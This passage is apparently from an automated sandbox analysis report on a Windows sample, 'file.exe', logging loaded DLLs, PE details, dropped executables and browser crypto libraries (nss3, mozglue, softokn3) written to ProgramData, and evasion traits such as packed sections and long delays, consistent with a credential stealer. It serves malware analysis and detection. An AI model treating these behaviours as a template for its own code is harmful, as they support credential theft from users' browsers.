                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
                Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
                Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                Source: Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
                Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
                Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
                Source: Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041616A
                Source: KJKJJJECFI.exe.2.drStatic PE information: real checksum: 0x32c4e should be: 0x31538
                Source: sql[1].dll.2.drStatic PE information: real checksum: 0x0 should be: 0x263795
                Source: file.exeStatic PE information: real checksum: 0x2f063 should be: 0x3d94c
                Source: 66d0cd9a65b5d_vqwergf[1].exe.2.drStatic PE information: real checksum: 0x32c4e should be: 0x31538
                Source: KKJEBAAECB.exe.2.drStatic PE information: real checksum: 0x511fe should be: 0x5fee9
                Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.drStatic PE information: real checksum: 0x511fe should be: 0x5fee9
                Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                Source: sql[1].dll.2.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041AA05 push ecx; ret 2_2_0041AA18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB536 push ecx; ret 2_2_6C0FB549
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043504B push ss; retf 9_2_0043504F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DAB3C51 push es; retf 12_2_1DAB3C57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB1DB66 push esp; retf 12_2_1DB1DB67
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB1D561 push esp; retf 12_2_1DB1D570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_1DB2F456 push ebx; ret 12_2_1DB2F457
                Source: file.exeStatic PE information: section name: .text entropy: 7.988086899463732
                Source: KKJEBAAECB.exe.2.drStatic PE information: section name: .text entropy: 7.99530141513891
                Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.drStatic PE information: section name: .text entropy: 7.99530141513891
                Source: KJKJJJECFI.exe.2.drStatic PE information: section name: .text entropy: 7.988564984813096
                Source: 66d0cd9a65b5d_vqwergf[1].exe.2.drStatic PE information: section name: .text entropy: 7.988564984813096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KKJEBAAECB.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KJKJJJECFI.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KKJEBAAECB.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\KJKJJJECFI.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041616A
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 4C10000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory allocated: 840000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\KKJEBAAECB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\KJKJJJECFI.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
